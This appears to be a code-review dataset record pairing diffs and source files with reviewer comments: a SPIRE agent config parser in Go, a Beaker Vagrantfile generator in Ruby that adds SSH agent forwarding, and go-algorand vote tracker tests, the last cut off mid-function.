server") flags.IntVar(&c.AgentConfig.ServerPort, "serverPort", 0, "Port number of the SPIRE server") flags.StringVar(&c.AgentConfig.TrustDomain, "trustDomain", "", "The trust domain that this agent belongs to") flags.StringVar(&c.AgentConfig.TrustBundlePath, "trustBundle", "", "Path to the SPIRE server CA bundle") flags.StringVar(&c.AgentConfig.JoinToken, "joinToken", "", "An optional token which has been generated by the SPIRE server") flags.StringVar(&c.AgentConfig.SocketPath, "socketPath", "", "Location to bind the workload API socket") flags.StringVar(&c.AgentConfig.DataDir, "dataDir", "", "A directory the agent can use for its runtime data") flags.StringVar(&c.AgentConfig.LogFile, "logFile", "", "File to write logs to") flags.StringVar(&c.AgentConfig.LogLevel, "logLevel", "", "DEBUG, INFO, WARN or ERROR") flags.StringVar(&c.AgentConfig.ConfigPath, "config", defaultConfigPath, "Path to a SPIRE config file") flags.StringVar(&c.AgentConfig.Umask, "umask", "", "Umask value to use for new files") err := flags.Parse(args) if err != nil { return nil, err } return c, nil } func mergeConfigs(c *agent.Config, fileConfig, cliConfig *runConfig) error { // CLI > File, merge fileConfig first err := mergeConfig(c, fileConfig) if err != nil { return err } return mergeConfig(c, cliConfig) } func mergeConfig(orig *agent.Config, cmd *runConfig) error { // Parse server address if cmd.AgentConfig.ServerAddress != "" { ips, err := net.LookupIP(cmd.AgentConfig.ServerAddress) if err != nil { return err } if len(ips) == 0 { return fmt.Errorf("Could not resolve ServerAddress %s", cmd.AgentConfig.ServerAddress) } serverAddress := ips[0] orig.ServerAddress.IP = serverAddress } if cmd.AgentConfig.ServerPort != 0 { orig.ServerAddress.Port = cmd.AgentConfig.ServerPort } if cmd.AgentConfig.TrustDomain != "" { trustDomain := url.URL{ Scheme: "spiffe", Host: cmd.AgentConfig.TrustDomain, } orig.TrustDomain = trustDomain } // Parse trust bundle if cmd.AgentConfig.TrustBundlePath != "" { bundle, err := parseTrustBundle(cmd.AgentConfig.TrustBundlePath) if err != nil { return fmt.Errorf("Error parsing trust bundle: %s", err) } orig.TrustBundle = bundle } if cmd.AgentConfig.JoinToken != "" { orig.JoinToken = cmd.AgentConfig.JoinToken } if cmd.AgentConfig.SocketPath != "" { orig.BindAddress.Name = cmd.AgentConfig.SocketPath } if cmd.AgentConfig.DataDir != "" { orig.DataDir = cmd.AgentConfig.DataDir } // Handle log file and level if cmd.AgentConfig.LogFile != "" || cmd.AgentConfig.LogLevel != "" { logLevel := defaultLogLevel if cmd.AgentConfig.LogLevel != "" { logLevel = cmd.AgentConfig.LogLevel } logger, err := log.NewLogger(logLevel, cmd.AgentConfig.LogFile) if err != nil { return fmt.Errorf("Could not open log file %s: %s", cmd.AgentConfig.LogFile, err) } orig.Log = logger } if cmd.AgentConfig.Umask != "" { umask, err := strconv.ParseInt(cmd.AgentConfig.Umask, 0, 0) if err != nil { return fmt.Errorf("Could not parse umask %s: %s", cmd.AgentConfig.Umask, err) } orig.Umask = int(umask) } return nil } func validateConfig(c *agent.Config) error { if c.ServerAddress.IP == nil || c.ServerAddress.Port == 0 { return errors.New("ServerAddress and ServerPort are required") } if c.TrustDomain.String() == "" { return errors.New("TrustDomain is required") } if c.TrustBundle == nil { return errors.New("TrustBundle is required") } return nil } func newDefaultConfig() *agent.Config { bindAddr := &net.UnixAddr{Name: defaultSocketPath, Net: "unix"} // log.NewLogger() cannot return error when using STDOUT logger, _ := log.NewLogger(defaultLogLevel, "") serverAddress := &net.TCPAddr{} return &agent.Config{ BindAddress: bindAddr, DataDir: defaultDataDir, Log: logger, ServerAddress: serverAddress, Umask: defaultUmask, } } func parseTrustBundle(path string) ([]*x509.Certificate, error) { pemData, err := ioutil.ReadFile(path) if err != nil { return nil, err } var data []byte for len(pemData) > 1 { var block *pem.Block block, pemData = pem.Decode(pemData) if block == nil && len(data) < 1 { return nil, errors.New("no certificates found") } if block == nil { return nil, errors.New("encountered unknown data in trust bundle") } if block.Type != "CERTIFICATE" { return nil, fmt.Errorf("non-certificate type %v found in trust bundle", block.Type) } data = append(data, block.Bytes...) } bundle, err := x509.ParseCertificates(data) if err != nil { return nil, fmt.Errorf("parse certificates from %v, %v", path, err) } return bundle, nil } func stringDefault(option string, defaultValue string) string { if option == "" { return defaultValue } return option } func signalListener(agt *agent.Agent) { go func() { signalCh := make(chan os.Signal, 1) signal.Notify(signalCh, syscall.SIGINT, syscall.SIGTERM) select { case <-signalCh: agt.Shutdown() } }() return }
1
9,152
Perhaps we can assume that profiling is enabled if ProfilingPort is set? And/or configure a default port and frequency, so we don't have to set three config vars every time?
spiffe-spire
go
@@ -22,6 +22,7 @@ module Beaker #HACK HACK HACK - add checks here to ensure that we have box + box_url #generate the VagrantFile v_file = "Vagrant.configure(\"2\") do |c|\n" + v_file << " c.ssh.forward_agent = true\n" unless options['forward_ssh_agent'].nil? hosts.each do |host| host['ip'] ||= randip #use the existing ip, otherwise default to a random ip v_file << " c.vm.define '#{host.name}' do |v|\n"
1
require 'open3' module Beaker class Vagrant < Beaker::Hypervisor # Return a random mac address # # @return [String] a random mac address def randmac "080027" + (1..3).map{"%0.2X"%rand(256)}.join end def rand_chunk (2 + rand(252)).to_s #don't want a 0, 1, or a 255 end def randip "10.255.#{rand_chunk}.#{rand_chunk}" end def make_vfile hosts, options = {} #HACK HACK HACK - add checks here to ensure that we have box + box_url #generate the VagrantFile v_file = "Vagrant.configure(\"2\") do |c|\n" hosts.each do |host| host['ip'] ||= randip #use the existing ip, otherwise default to a random ip v_file << " c.vm.define '#{host.name}' do |v|\n" v_file << " v.vm.hostname = '#{host.name}'\n" v_file << " v.vm.box = '#{host['box']}'\n" v_file << " v.vm.box_url = '#{host['box_url']}'\n" unless host['box_url'].nil? v_file << " v.vm.box_version = '#{host['box_version']}'\n" unless host['box_version'].nil? v_file << " v.vm.box_check_update = '#{host['box_check_update'] ||= 'true'}'\n" v_file << " v.vm.network :private_network, ip: \"#{host['ip'].to_s}\", :netmask => \"#{host['netmask'] ||= "255.255.0.0"}\", :mac => \"#{randmac}\"\n" if /windows/i.match(host['platform']) v_file << " v.vm.network :forwarded_port, guest: 3389, host: 3389\n" v_file << " v.vm.network :forwarded_port, guest: 5985, host: 5985, id: 'winrm', auto_correct: true\n" v_file << " v.vm.guest = :windows" end v_file << self.class.provider_vfile_section(host, options) v_file << " end\n" @logger.debug "created Vagrantfile for VagrantHost #{host.name}" end v_file << "end\n" File.open(@vagrant_file, 'w') do |f| f.write(v_file) end end def self.provider_vfile_section host, options # Backwards compatibility; default to virtualbox Beaker::VagrantVirtualbox.provider_vfile_section(host, options) end def set_ssh_config host, user f = Tempfile.new("#{host.name}") ssh_config = Dir.chdir(@vagrant_path) do stdin, stdout, stderr, wait_thr = Open3.popen3('vagrant', 'ssh-config', host.name) if not wait_thr.value.success? raise "Failed to 'vagrant ssh-config' for #{host.name}" end stdout.read end #replace hostname with ip ssh_config = ssh_config.gsub(/Host #{host.name}/, "Host #{host['ip']}") unless not host['ip'] if host['platform'] =~ /windows/ ssh_config = ssh_config.gsub(/127\.0\.0\.1/, host['ip']) unless not host['ip'] end #set the user ssh_config = ssh_config.gsub(/User vagrant/, "User #{user}") f.write(ssh_config) f.rewind host['ssh'] = {:config => f.path()} host['user'] = user @temp_files << f end def get_ip_from_vagrant_file(hostname) ip = '' if File.file?(@vagrant_file) #we should have a vagrant file available to us for reading f = File.read(@vagrant_file) m = /#{hostname}.*?ip:\s*('|")\s*([^'"]+)('|")/m.match(f) if m ip = m[2] @logger.debug("Determined existing vagrant box #{hostname} ip to be: #{ip} ") else raise("Unable to determine ip for vagrant box #{hostname}") end else raise("No vagrant file found (should be located at #{@vagrant_file})") end ip end def initialize(vagrant_hosts, options) require 'tempfile' @options = options @logger = options[:logger] @temp_files = [] @hosts = vagrant_hosts @vagrant_path = File.expand_path(File.join(File.basename(__FILE__), '..', '.vagrant', 'beaker_vagrant_files', File.basename(options[:hosts_file]))) FileUtils.mkdir_p(@vagrant_path) @vagrant_file = File.expand_path(File.join(@vagrant_path, "Vagrantfile")) end def provision(provider = nil) if !@options[:provision] and !File.file?(@vagrant_file) raise "Beaker is configured with provision = false but no vagrant file was found at #{@vagrant_file}. You need to enable provision" end if @options[:provision] #setting up new vagrant hosts #make sure that any old boxes are dead dead dead vagrant_cmd("destroy --force") if File.file?(@vagrant_file) make_vfile @hosts, @options vagrant_cmd("up#{" --provider #{provider}" if provider}") else #set host ip of already up boxes @hosts.each do |host| host[:ip] = get_ip_from_vagrant_file(host.name) end end @logger.debug "configure vagrant boxes (set ssh-config, switch to root user, hack etc/hosts)" @hosts.each do |host| default_user = host['user'] set_ssh_config host, 'vagrant' #copy vagrant's keys to roots home dir, to allow for login as root copy_ssh_to_root host, @options #ensure that root login is enabled for this host enable_root_login host, @options #shut down connection, will reconnect on next exec host.close set_ssh_config host, default_user end hack_etc_hosts @hosts, @options end def cleanup @logger.debug "removing temporory ssh-config files per-vagrant box" @temp_files.each do |f| f.close() end @logger.notify "Destroying vagrant boxes" vagrant_cmd("destroy --force") FileUtils.rm_rf(@vagrant_path) end def vagrant_cmd(args) Dir.chdir(@vagrant_path) do exit_status = 1 Open3.popen3("vagrant #{args}") {|stdin, stdout, stderr, wait_thr| while line = stdout.gets @logger.info(line) end if not wait_thr.value.success? raise "Failed to exec 'vagrant #{args}'" end exit_status = wait_thr.value } if exit_status != 0 raise "Failed to execute vagrant_cmd ( #{args} )" end end end end end
1
8,102
This nil check won't correctly handle the case where forward_ssh_agent is set to false - it won't be nil but it should still not be set.
voxpupuli-beaker
rb
@@ -521,7 +521,7 @@ func TestVoteTrackerFiltersDuplicateVoteOnce(t *testing.T) { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, Val1) expectedOutputs[i] = thresholdEvent{T: none} case i == Num: - inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[Num-1].(voteAcceptedEvent).Vote.R} + inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[Num-1].(voteAcceptedEvent).Vote.R, Proto: protocol.ConsensusCurrentVersion} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } }
1
// Copyright (C) 2019 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package agreement import ( "testing" "github.com/stretchr/testify/require" "github.com/algorand/go-algorand/config" "github.com/algorand/go-algorand/protocol" ) // todo: test validity of threshold events (incl. bundles) // todo: test vote weights (and not just number of votes) // make a voteTracker at zero state func makeVoteTrackerZero() listener { return checkedListener{listener: new(voteTracker), listenerContract: new(voteTrackerContract)} } // actual tests func TestVoteTrackerNoOp(t *testing.T) { helper := voteMakerHelper{} helper.Setup() voteAcceptEvent := helper.MakeValidVoteAccepted(t, 0, soft) testCase := determisticTraceTestCase{ inputs: []event{ voteAcceptEvent, }, expectedOutputs: []event{ thresholdEvent{T: none}, }, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Test case 1 did not validate") } func TestVoteTrackerSoftQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) require.Falsef(t, soft.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold-1), "Test case malformed; generates too many votes") require.Truef(t, soft.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold), "Test case malformed; generates too few votes") inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, soft) expectedOutputs[i] = thresholdEvent{T: none} } // given quorum of soft votes, we expect to see soft threshold expectedOutputs[len(expectedOutputs)-1] = thresholdEvent{T: softThreshold, Proposal: *helper.proposal} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event not generated") // now, do the same thing, but have one less vote, so expect no threshold inputVotes = inputVotes[:len(inputVotes)-1] expectedOutputs = expectedOutputs[:len(expectedOutputs)-1] testCaseNoThreshold := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata = &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err = testCaseNoThreshold.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event should not have been generated") } // sanity check for cert quorums func TestVoteTrackerCertQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := cert.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) require.Falsef(t, cert.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold-1), "Test case malformed; generates too many votes") require.Truef(t, cert.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold), "Test case malformed; generates too few votes") inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, cert) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[len(expectedOutputs)-1] = thresholdEvent{T: certThreshold, Proposal: *helper.proposal} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event not generated") // now, do the same thing, but have one less vote inputVotes = inputVotes[:len(inputVotes)-1] expectedOutputs = expectedOutputs[:len(expectedOutputs)-1] testCaseNoThreshold := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata = &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err = testCaseNoThreshold.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event should not have been generated") } // sanity check for next quorums func TestVoteTrackerNextQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := next.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) require.Falsef(t, next.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold-1), "Test case malformed; generates too many votes") require.Truef(t, next.reachesQuorum(config.Consensus[protocol.ConsensusCurrentVersion], NumThreshold), "Test case malformed; generates too few votes") inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, next) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[len(expectedOutputs)-1] = thresholdEvent{T: nextThreshold, Proposal: *helper.proposal} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event not generated") // now, do the same thing, but have one less vote inputVotes = inputVotes[:len(inputVotes)-1] expectedOutputs = expectedOutputs[:len(expectedOutputs)-1] testCaseNoThreshold := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata = &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err = testCaseNoThreshold.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event should not have been generated") } // sanity check propose votes don't trigger anything func TestVoteTrackerProposeNoOp(t *testing.T) { helper := voteMakerHelper{} helper.Setup() const NumUpperBound = 2000 inputVotes := make([]event, NumUpperBound) for i := 0; i < len(inputVotes); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, propose) } // here, each input is a separate test-case for i := 0; i < NumUpperBound; i++ { testCase := determisticTraceTestCase{ inputs: inputVotes[i : i+1], expectedOutputs: nil, // we expect the input to panic } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err, "A vote with step propose did not result in a precondition violation") require.NoError(t, res, "A vote with step propose did not result in a precondition violation") } } func TestVoteTrackerEquivocatorWeightCountedOnce(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) for i := 0; i < int(NumThreshold-1); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, soft) expectedOutputs[i] = thresholdEvent{T: none} } // generate an equivocation inputVotes[NumThreshold-1] = helper.MakeValidVoteAccepted(t, 0, soft) expectedOutputs[NumThreshold-1] = thresholdEvent{T: none} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Threshold event generated due to equivocation double counting") } func TestVoteTrackerEquivDoesntReemitThreshold(t *testing.T) { helper := voteMakerHelper{} helper.Setup() NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, NumThreshold+2) expectedOutputs := make([]event, NumThreshold+2) for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAccepted(t, i, soft) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: softThreshold, Proposal: *helper.proposal} // generate an equivocation v := randomBlockHash() equivVal := proposalValue{BlockDigest: v} require.NotEqualf(t, *helper.proposal, equivVal, "Test does not generate equivocating values...") inputVotes[NumThreshold] = helper.MakeValidVoteAcceptedVal(t, 0, soft, equivVal) expectedOutputs[NumThreshold] = thresholdEvent{T: none} // generate one more valid vote inputVotes[NumThreshold+1] = helper.MakeValidVoteAccepted(t, int(NumThreshold+1), soft) expectedOutputs[NumThreshold+1] = thresholdEvent{T: none} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Extra threshold events generated") } func TestVoteTrackerEquivocationsCount(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") // lets use cert this time... NumThreshold := cert.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) TotalThreshold := NumThreshold + NumThreshold - NumThreshold/2 inputVotes := make([]event, NumThreshold+NumThreshold/2) expectedOutputs := make([]event, NumThreshold+NumThreshold/2) // generate threshold/2 non equivocating votes for i := 0; i < int(NumThreshold/2); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} } // generate threshold/2 votes for v2. This shouldn't trigger a threshold event for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} } // now, for the last threshold/2 votes, have them equivocate for v1. This should generate a threshold event. // we may need to update our test case once we implement early next-vote bottom detection. for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[int(NumThreshold)+i-int(NumThreshold/2)] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal1) expectedOutputs[int(NumThreshold)+i-int(NumThreshold/2)] = thresholdEvent{T: none} } expectedOutputs[TotalThreshold-1] = thresholdEvent{T: certThreshold, Proposal: equivVal1} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Equivocation adversely affected threshold generation") } // same test as before, except equivocations voting v2, v3 should also count towards quorum for v1 func TestVoteTrackerSuperEquivocationsCount(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value triplet v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} v3 := randomBlockHash() equivVal3 := proposalValue{BlockDigest: v3} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal2, equivVal3, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal1, equivVal3, "Test does not generate equivocating values...") // lets use cert this time... NumThreshold := cert.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) TotalThreshold := NumThreshold + NumThreshold - NumThreshold/2 inputVotes := make([]event, NumThreshold+NumThreshold/2) expectedOutputs := make([]event, NumThreshold+NumThreshold/2) // generate threshold/2 non equivocating votes for i := 0; i < int(NumThreshold/2); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} } // generate threshold/2 votes for v2. This shouldn't trigger a threshold event for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} } // now, for the last threshold/2 votes, have them equivocate for v1. This should generate a threshold event. // we may need to update our test case once we implement early next-vote bottom detection. for i := int(NumThreshold / 2); i < int(NumThreshold); i++ { inputVotes[int(NumThreshold)+i-int(NumThreshold/2)] = helper.MakeValidVoteAcceptedVal(t, i, cert, equivVal3) expectedOutputs[int(NumThreshold)+i-int(NumThreshold/2)] = thresholdEvent{T: none} } expectedOutputs[TotalThreshold-1] = thresholdEvent{T: certThreshold, Proposal: equivVal1} testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "Equivocation adversely affected threshold generation") } // check that SM panics on seeing two quorums func TestVoteTrackerPanicsOnTwoSoftQuorums(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, 2*NumThreshold) expectedOutputs := make([]event, 2*NumThreshold) // generate quorum for v1 for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, soft, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: softThreshold, Proposal: equivVal1} // generate quorum for v2 for i := int(NumThreshold); i < int(2*NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, soft, equivVal2) expectedOutputs[i] = thresholdEvent{T: none} } // the last output should be a panic. Express this by shortening expected outputs expectedOutputs = expectedOutputs[:2*NumThreshold-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not panic on seeing two quorums for v1 != v2") } // check that SM panics on seeing soft quorum for bot (currently enforced by contract) func TestVoteTrackerPanicsOnSoftBotQuorum(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair NumThreshold := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, NumThreshold) expectedOutputs := make([]event, NumThreshold) // generate quorum for bot for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, soft, bottom) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: softThreshold, Proposal: bottom} // the last output should be a panic. Express this by shortening expected outputs expectedOutputs = expectedOutputs[:NumThreshold-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not panic on seeing soft vote bot quorum") } // check that SM panics on seeing two next quorums, in particular bot, val in same step. func TestVoteTrackerPanicsOnTwoNextQuorums(t *testing.T) { helper := voteMakerHelper{} helper.Setup() // generate an equivocation value pair v2 := randomBlockHash() val2 := proposalValue{BlockDigest: v2} require.NotEqualf(t, bottom, val2, "Test does not generate equivocating values...") NumThreshold := next.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, 2*NumThreshold) expectedOutputs := make([]event, 2*NumThreshold) // generate quorum for bot for i := 0; i < int(NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, bottom) expectedOutputs[i] = thresholdEvent{T: none} } expectedOutputs[NumThreshold-1] = thresholdEvent{T: nextThreshold, Proposal: bottom} // generate quorum for v2 for i := int(NumThreshold); i < int(2*NumThreshold); i++ { inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, val2) expectedOutputs[i] = thresholdEvent{T: none} } // the last output should be a panic. Express this by shortening expected outputs expectedOutputs = expectedOutputs[:2*NumThreshold-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not panic on seeing two quorums for v1 != v2") } func TestVoteTrackerRejectsTooManyEquivocators(t *testing.T) { helper := voteMakerHelper{} helper.Setup() Num := soft.threshold(config.Consensus[protocol.ConsensusCurrentVersion]) inputVotes := make([]event, Num*2) expectedOutputs := make([]event, Num*2) for i := 0; i < int(2*Num); i++ { Val := proposalValue{BlockDigest: randomBlockHash()} inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, int(i/2), soft, Val) expectedOutputs[i] = thresholdEvent{T: none} } // We should now have threshold many equivocators... should have panicked when the last equivocation was seen. expectedOutputs[2*Num-2] = thresholdEvent{T: softThreshold, Proposal: inputVotes[2*Num-2].(voteAcceptedEvent).Vote.R.Proposal} expectedOutputs = expectedOutputs[:2*Num-1] testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not reject too many equivocations") } /* tests for filtering component of vote tracker */ func TestVoteTrackerFiltersDuplicateVoteOnce(t *testing.T) { helper := voteMakerHelper{} helper.Setup() v1 := randomBlockHash() Val1 := proposalValue{BlockDigest: v1} const Num = 10 inputVotes := make([]event, Num+1) expectedOutputs := make([]event, Num+1) for i := 0; i < int(Num+1); i++ { switch { case i < Num: inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, Val1) expectedOutputs[i] = thresholdEvent{T: none} case i == Num: inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[Num-1].(voteAcceptedEvent).Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} } } testCase := determisticTraceTestCase{ inputs: inputVotes, expectedOutputs: expectedOutputs, } voteTrackerAutomata := &ioAutomataConcrete{ listener: makeVoteTrackerZero(), } res, err := testCase.Validate(voteTrackerAutomata) require.NoError(t, err) require.NoErrorf(t, res, "VoteTracker did not filter duplicate") } func TestVoteTrackerForwardsFirstEquivocation(t *testing.T) { helper := voteMakerHelper{} helper.Setup() const V1Bound = 10 const V2Bound = 20 const V1V2Bound = 30 // generate an equivocation value pair v1 := randomBlockHash() equivVal1 := proposalValue{BlockDigest: v1} v2 := randomBlockHash() equivVal2 := proposalValue{BlockDigest: v2} v3 := randomBlockHash() equivVal3 := proposalValue{BlockDigest: v3} require.NotEqualf(t, equivVal1, equivVal2, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal2, equivVal3, "Test does not generate equivocating values...") require.NotEqualf(t, equivVal1, equivVal3, "Test does not generate equivocating values...") inputVotes := make([]event, V1V2Bound+1) expectedOutputs := make([]event, V1V2Bound+1) for i := 0; i < int(V1V2Bound+1); i++ { switch { case i < V1Bound: // these will eventually equivocate inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, equivVal1) expectedOutputs[i] = thresholdEvent{T: none} case i == V1Bound: // simple duplicate inputVotes[i] = voteFilterRequestEvent{RawVote: inputVotes[i-1].(voteAcceptedEvent).Vote.R} expectedOutputs[i] = filteredStepEvent{T: voteFilteredStep} case i < V2Bound: // these dont equivocate inputVotes[i] = helper.MakeValidVoteAcceptedVal(t, i, next, equivVal2) 